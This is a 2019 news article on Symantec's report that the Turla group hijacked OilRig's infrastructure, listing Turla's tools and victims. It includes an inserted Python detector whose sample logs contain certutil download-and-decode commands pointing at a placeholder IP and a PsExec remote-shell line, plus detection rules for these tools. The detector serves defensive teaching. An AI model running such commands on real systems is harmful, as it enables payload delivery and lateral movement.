Friday, 21 June 2019 09:38

A tale of two threat actors: Symantec claims one used the other's infrastructure in attack

A well-known attack group that is known as Turla, Snake or Waterbug appears to have hijacked and used the infrastructure of another similar group, known as OilRig, APT34 or Crambus, the American security firm Symantec claims.

Turla then used this infrastructure in an attack on a government in the Middle East which OilRig had already compromised, the company claimed in a detailed blog post.

[Given the numerous names bestowed on these attack groups, iTWire will use only Turla and OilRig in this article to avoid confusion.]

But this phenomenon was hinted at in research presented by Kaspersky (formerly Kaspersky Lab) researcher Kurt Baumgartner at his employer's annual security analyst summit in Cancun last year. A Russian-speaking online threat actor, Sofacy, sometimes overlapped with other threat actors like Turla and the Chinese-speaking Danti, when targeting victims, his research claimed.

Baumgartner said Sofacy backdoors were also found on a server which had been previously compromised by the English-speaking threat actor behind the Lamberts, a term used by Kaspersky to indicate CIA-inspired attacks.

Of interest, given the recent brouhaha over stolen NSA exploits, was Symantec's claim that in the course of its attacks, Turla used a custom hacking tool that combined four tools leaked by the Shadow Brokers — EternalBlue, EternalRomance, DoublePulsar and SMBTouch — into a single executable.

Actors from Turla have been observed to be Russian speakers, while OilRig has been linked to Iran by the security firm FireEye which, admittedly, is quicker to attribute attacks than other companies, many of which are reluctant to do so.

The Symantec post comes at a time of rising US pressure on Iran, following the downing of an American spy drone over Iranian territory, as per claims from Teheran. The Americans claim the incident took place over international waters.

Russia has been under US pressure for a long time, ever since claims were made that it played a role in the US presidential election of 2016. An investigation of more than two years by former FBI chief Robert Mueller failed to come up with any definitive evidence to support this claim.

Symantec's DeepSight Adversary Intelligence Team said recent activity by Turla could be divided into three campaigns, based on the toolsets used. One used a new backdoor called Neptun that acts as a passive listening tool and infects Microsoft Exchange servers. It was an attack during this campaign that used infrastructure belonging to OilRig.

A second campaign used the publicly available backdoor Meterpreter, along with two custom loaders: a custom backdoor, photobased.dll, and a custom RPC (Remote Procedure Call) backdoor. A third campaign used a different RPC backdoor built from code derived from PowerShellRunner, a tool that is used to execute PowerShell scripts without using the official PowerShell binary.

Victims of the three Turla campaigns were listed as:

  • The foreign affairs ministry of a Latin American country;
  • The foreign affairs ministry of a Middle Eastern country;
  • The foreign affairs ministry of a European country;
  • The interior ministry of a South Asian country;
  • Two unidentified government organisations in a Middle Eastern country;
  • One unidentified government organisation in a Southeast Asian country;
  • A government office of a South Asian country based in another country;
  • An information and communications technology organisation in a Middle Eastern country;
  • Two information and communications technology organisations in two European countries;
  • An information and communications technology organisation in a South Asian country;
  • A multinational organisation in a Middle Eastern country; and
  • An educational institution in a South Asian country.

Regarding the hijacking of OilRig infrastructure by Turla, Symantec said it was possible that the two groups were, instead, collaborating in attacking the same victim, a target in the Middle East. But it said it had not found further evidence in support of this theory.

"In all likelihood, Turla’s use of OilRig infrastructure appears to have been a hostile takeover," the Symantec team speculated. "Curiously though, Turla also compromised other computers on the victim’s network using its own infrastructure."

Turla's recent campaigns have been marked by the deployment of new tools, Symantec said, listing the following:

  • A new custom dropper typically used to install Neptun as a service.
  • A custom hacking tool that combines four leaked Equation Group tools (EternalBlue, EternalRomance, DoublePulsar, SMBTouch) into a single executable.
  • A USB data collecting tool that checks for a connected USB drive and steals certain file types, encrypting them into a RAR file. It then uses WebDAV to upload to a Box cloud drive.
  • Visual Basic scripts that perform system reconnaissance after initial infection and then send information to Turla command and control (C&C) servers.
  • PowerShell scripts that perform system reconnaissance and credential theft from Windows Credential Manager and then send this information back to Turla C&Cs.
  • Publicly available tools such as IntelliAdmin to execute RPC commands, SScan and NBTScan for network reconnaissance, PsExec for execution and lateral movement, Mimikatz (Hacktool.Mimikatz) for credential theft, and Certutil.exe to download and decode remote files. These tools were observed being downloaded via Turla tools or infrastructure.
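
Most of the tooling listed above, and the PowerShellRunner-derived backdoor described earlier, relies on ordinary Windows utilities or on hosting the PowerShell engine inside a process that is not powershell.exe, which is exactly what makes it hard to spot with signature-based tools. The following detector is an added example written for this article; it is not code from iTWire, Symantec or Turla's toolset. It parses a handful of constructed log lines (loosely modelled on Sysmon process-creation and image-load events, with invented hostnames, users and paths) and flags certutil used to download or decode files, PsExec and NBTScan/SScan execution, and any process other than a PowerShell host loading System.Management.Automation.dll. The key=value log format, the field names and the sample values are all assumptions for the example.

```python
"""Detector for living-off-the-land tooling of the kind attributed to Turla.

Added example, not part of the iTWire article or Symantec's report. The log
format (Key=value pairs, Sysmon-like EventID 1 = process create, 7 = image
load) and every host, user and path below are constructed for illustration.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample events: hosts, users and paths are invented.
SAMPLE_LOGS = [
    r'EventID=1 Host=ws-014 User=CORP\jdoe Image=C:\Windows\System32\certutil.exe CommandLine="certutil -urlcache -split -f http://198.51.100.23/img.txt C:\Users\Public\img.txt"',
    r'EventID=1 Host=ws-014 User=CORP\jdoe Image=C:\Windows\System32\certutil.exe CommandLine="certutil -decode C:\Users\Public\img.txt C:\Users\Public\svc.dll"',
    r'EventID=1 Host=ws-014 User=CORP\jdoe Image=C:\Windows\System32\certutil.exe CommandLine="certutil -dump C:\certs\leaf.cer"',
    r'EventID=1 Host=ws-014 User=CORP\jdoe Image=C:\Tools\PsExec.exe CommandLine="PsExec.exe \\srv-02 -s cmd.exe"',
    r'EventID=1 Host=ws-014 User=CORP\jdoe Image=C:\Tools\nbtscan.exe CommandLine="nbtscan 10.0.0.0/24"',
    r'EventID=7 Host=srv-02 Image=C:\Windows\System32\svchost.exe ImageLoaded=C:\Windows\assembly\System.Management.Automation.dll',
    r'EventID=7 Host=srv-02 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ImageLoaded=C:\Windows\assembly\System.Management.Automation.dll',
    r'EventID=1 Host=ws-014 User=CORP\jdoe Image=C:\Windows\explorer.exe CommandLine="explorer.exe"',
]

# Key=value or Key="value with spaces"
_KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# Legitimate hosts of the PowerShell engine; anything else loading the
# automation assembly is worth a look (PowerShellRunner-style execution).
POWERSHELL_HOSTS = {"powershell.exe", "powershell_ise.exe", "pwsh.exe"}


@dataclass
class Finding:
    host: str
    rule: str
    evidence: str


def parse_event(line: str) -> Dict[str, str]:
    """Split one log line into a field dictionary."""
    return {key: quoted or bare for key, quoted, bare in _KV_RE.findall(line)}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_event(ev: Dict[str, str]) -> Optional[Finding]:
    """Apply the detection rules to one parsed event."""
    host = ev.get("Host", "?")
    image = basename(ev.get("Image", ""))
    cmd = ev.get("CommandLine", "")

    if ev.get("EventID") == "1":
        # certutil as downloader (-urlcache) or payload decoder (-decode)
        if image == "certutil.exe" and re.search(r"(^|\s)[-/](urlcache|decode)\b", cmd.lower()):
            return Finding(host, "certutil download/decode", cmd)
        # PsExec: remote execution and lateral movement
        if image.startswith("psexec"):
            return Finding(host, "psexec remote execution", cmd)
        # NBTScan / SScan: network reconnaissance
        if image in {"nbtscan.exe", "sscan.exe"}:
            return Finding(host, "network scanner", cmd)
    elif ev.get("EventID") == "7":
        loaded = basename(ev.get("ImageLoaded", ""))
        if loaded == "system.management.automation.dll" and image not in POWERSHELL_HOSTS:
            return Finding(host, "powershell engine hosted outside powershell.exe", ev.get("Image", ""))
    return None


def scan(lines: List[str]) -> List[Finding]:
    """Run every rule over every line and collect the hits."""
    return [f for f in (check_event(parse_event(line)) for line in lines) if f]


def summarise(findings: List[Finding]) -> Dict[str, int]:
    """Count findings per rule, handy for a quick triage view."""
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"{f.host}: {f.rule} -> {f.evidence}")
```

On the sample set the detector flags five events and lets the benign certutil, powershell.exe and explorer.exe lines through. The image-load rule is the one worth noting: a backdoor that embeds the PowerShell engine never spawns powershell.exe, so command-line monitoring alone misses it, while the assembly it must load does not change.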

Symantec said there could be a number of reasons for the attackers behind Turla choosing to use infrastructure from OilRig.

One was as a false flag operation, to deceive anyone observing the campaign as to the identity of the actual attacker. A second possibility was that Turla used OilRig's infrastructure as the latter had already gained entry to the target.

"This is the first time Symantec has observed one targeted attack group seemingly hijack and use the infrastructure of another group. However, it is still difficult to ascertain the motive behind the attack. Whether Turla simply seized the opportunity to create confusion about the attack or whether there was more strategic thinking involved remains unknown," the researchers wrote.

"Turla's ever-changing toolset demonstrates a high degree of adaptability by a group determined to avoid detection by staying one step ahead of its targets. Frequent retooling and a penchant for flirting with false flag tactics have made this group one of the most challenging adversaries on the targeted attack landscape."

Sam Varghese

Sam Varghese has been writing for iTWire since 2006, a year after the site came into existence. For nearly a decade thereafter, he wrote mostly about free and open source software, based on his own use of this genre of software. Since May 2016, he has been writing across many areas of technology. He has been a journalist for nearly 40 years in India (Indian Express and Deccan Herald), the UAE (Khaleej Times) and Australia (Daily Commercial News (now defunct) and The Age). His personal blog is titled Irregular Expression.